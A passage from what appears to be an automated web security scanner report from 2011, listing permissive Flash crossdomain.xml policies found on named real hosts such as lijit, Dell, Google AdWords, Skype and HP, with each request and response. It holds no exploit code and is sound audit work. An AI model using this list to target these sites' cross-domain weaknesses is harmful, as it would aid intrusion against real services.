GET /crossdomain.xml HTTP/1.0
Host: vap1iad2.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:34 GMT
ETag: "e7efc-83-4aad043c8df80"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.37. http://vap1sfo1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap1sfo1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap1sfo1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:30:51 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:50:28 GMT
ETag: "b6f8a-83-4aad04700d900"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.38. http://vap2den1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap2den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:31:26 GMT
Server: Apache
Last-Modified: Thu, 18 Aug 2011 22:28:06 GMT
ETag: "e0619-83-4aacf206fe980"
Accept-Ranges: bytes
Content-Length: 131
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Connection: close
Content-Type: text/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.39. http://vap2iad1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap2iad1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap2iad1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 23:49:04 GMT
ETag: "a559f-83-4aad041ff1c00"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.40. http://vap3den1.lijit.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vap3den1.lijit.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: vap3den1.lijit.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:34:05 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Thu, 18 Aug 2011 22:29:05 GMT
ETag: "122831-83-4aacf23f74ab7"
Accept-Ranges: bytes
Content-Length: 131
Cache-Control: must-revalidate
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*"/>
</cross-domain-policy>

4.41. http://www.cymphonix.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cymphonix.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cymphonix.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:07 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Tue, 06 Jan 2009 07:09:52 GMT
ETag: "30d8758-69-17f87000"
Accept-Ranges: bytes
Content-Length: 105
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.42. http://www.xg4ken.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.xg4ken.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.xg4ken.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 02:46:32 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Mon, 21 Dec 2009 22:59:19 GMT
ETag: "35800d-c6-47b450a15bfc0"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.43. http://accessories.us.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://accessories.us.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: accessories.us.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 28 May 2009 18:43:47 GMT
Accept-Ranges: bytes
ETag: "2747823cc4dfc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.dell.com/w3c/policy.xml",CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
Date: Sun, 04 Sep 2011 16:29:05 GMT
Connection: close
Content-Length: 364

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.triaddigital.com" />
...[SNIP]...

4.44. https://adwords.google.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adwords.google.com

Response

HTTP/1.0 200 OK
Expires: Mon, 05 Sep 2011 16:28:57 GMT
Date: Sun, 04 Sep 2011 16:28:57 GMT
Cache-Control: public, max-age=86400
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.45. http://blogs.skype.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: blogs.skype.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:34 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Wed, 21 Apr 2010 18:34:22 GMT
ETag: "42ce4b-173-484c371592780"
Accept-Ranges: bytes
Content-Length: 371
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" />
<allow-access-from domain="*.skype.net" />
<allow-access-from domain="*.skype.test"/>
...[SNIP]...

4.46. http://content-cdn.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content-cdn.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content-cdn.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
ETag: "2d593b04245cb1:0"
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:08 GMT
Content-Length: 270
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.47. http://content.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://content.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.dell.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 26 Aug 2010 17:13:28 GMT
Accept-Ranges: bytes
ETag: "2d593b04245cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Date: Sun, 04 Sep 2011 16:19:09 GMT
Connection: close
Content-Length: 270

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>


...[SNIP]...
<allow-access-from domain="*.dell.com" />
...[SNIP]...

4.48. http://disqus.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://disqus.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: disqus.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:09:38 GMT
Server: Apache
Vary: Cookie,Accept-Encoding
p3p: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Connection: close
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.usopen.org" to-ports="80,96" secure="false" />
...[SNIP]...

4.49. http://embed.technorati.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://embed.technorati.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: embed.technorati.com

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 05:29:04 GMT
Server: Apache
Last-Modified: Thu, 29 Oct 2009 01:09:39 GMT
ETag: "1d5c40-14f-4770890c33ac0"
Accept-Ranges: bytes
Content-Length: 335
Content-Type: text/xml
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.technorati.com" />
<allow-access-from domain="technorati.whsites.net" />
<allow-access-from domain="convoad.technoratimedia.com" />
...[SNIP]...

4.50. http://h30415.www3.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30415.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30415.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Last-Modified: Sat, 17 May 2008 20:24:00 GMT
ETag: "556e68-469-44d72e9257800"
Accept-Ranges: bytes
Content-Length: 1129
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="feedroom.speedera.net" />
<allow-access-from domain="qa.www.feedroom.com" />
<allow-access-from domain="*.feedroom.com" />
   <allow-access-from domain="*.*.nytimes.com" />
   <allow-access-from domain="*.nytimes.com" />
   <allow-access-from domain="*.nytvideo.feedroom.com" />
   <allow-access-from domain="*.www.feedroom.com" />
   <allow-access-from domain="downloads.feedroom.com" />
   <allow-access-from domain="*.downloads.feedroom.com" />
   <allow-access-from domain="*.lw-player.feedroom.com" />
   <allow-access-from domain="*.canoe.com" />
   <allow-access-from domain="*.canoe.com.edgesuite.net" />
   <allow-access-from domain="*.usatoday.com" />
   <allow-access-from domain="*.nymag.com" />
   <allow-access-from domain="*.canoe.ca" />
   <allow-access-from domain="*.hsus.org" />
<allow-access-from domain="*.temel.com"/>
<allow-access-from domain="*.curiousmedia.com"/>
<allow-access-from domain="*.odopod.com"/>
...[SNIP]...

4.51. http://h30507.www3.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h30507.www3.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h30507.www3.hp.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:32:33 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 31 Aug 2011 09:01:47 GMT
ETag: "1821c2d-1d0-4abc960c2d4c0"
Accept-Ranges: bytes
Content-Length: 464
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mast
...[SNIP]...
<allow-access-from domain="h41112.www4.hp.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false" />
...[SNIP]...

4.52. http://h41131.www4.hp.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://h41131.www4.hp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: h41131.www4.hp.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
ETag: "1079908203"
Last-Modified: Wed, 21 Oct 2009 08:26:38 GMT
Server: lighttpd
Content-Length: 642
Date: Sun, 04 Sep 2011 16:32:35 GMT
X-Varnish: 766108063
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.hp.com" />
   <allow-access-from domain="*.21torr.com" />
   <allow-access-from domain="*.google.*" />
   <allow-access-from domain="*.gmodules.*" />
   <allow-access-from domain="*.seitenschwung.de" />
<allow-access-from domain="*.seitenschwung.de/21T" />
...[SNIP]...

4.53. http://i.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://i.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.dell.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 24 Jun 2010 19:18:24 GMT
ETag: "040eb3d213cb1:0"
Date: Sun, 04 Sep 2011 16:19:15 GMT
Content-Length: 1152
Connection: close
Cache-Control: public, max-age=604800

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
<allow-access-from domain="*.twitter.com" />
<allow-access-from domain="*.radian6.com" />
<allow-access-from domain="*.ideastorm.com" />
<allow-access-from domain="*.flickr.com" />
...[SNIP]...

4.54. http://lt.dell.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lt.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: lt.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 942
Content-Type: text/xml
Last-Modified: Thu, 18 Feb 2010 21:01:46 GMT
Accept-Ranges: bytes
ETag: "bf15fe94ddb0ca1:ed9"
X-Powered-By: ASP.NET
Server: Unauthorized-Use-Prohibited
Date: Sun, 04 Sep 2011 16:18:55 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-
...[SNIP]...
<allow-access-from domain="*.dell.com"/>
<allow-access-from domain="*.coltas.com"/>
<allow-access-from domain="*.dellpartnerdirect.com"/>
<allow-access-from domain="*.atlasrichmedia.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.co.uk" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atlasrichmedia.com.au" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.akamai.net" secure="true" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.yr.ca"/>
<allow-access-from domain="services.gizmo.com.au" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...

4.55. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Sun, 04 Sep 2011 23:59:50 GMT
Expires: Mon, 05 Sep 2011 23:59:50 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 6423
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.56. https://secure.skypeassets.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.skypeassets.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.skypeassets.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Oct 2010 09:18:24 GMT
ETag: "1a2-4929031207800"
Content-Type: application/xml
Content-Language: en
Date: Sun, 04 Sep 2011 18:08:47 GMT
Content-Length: 418
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>    
<allow-access-from domain="*.skype.com" secure="false" />
...[SNIP]...
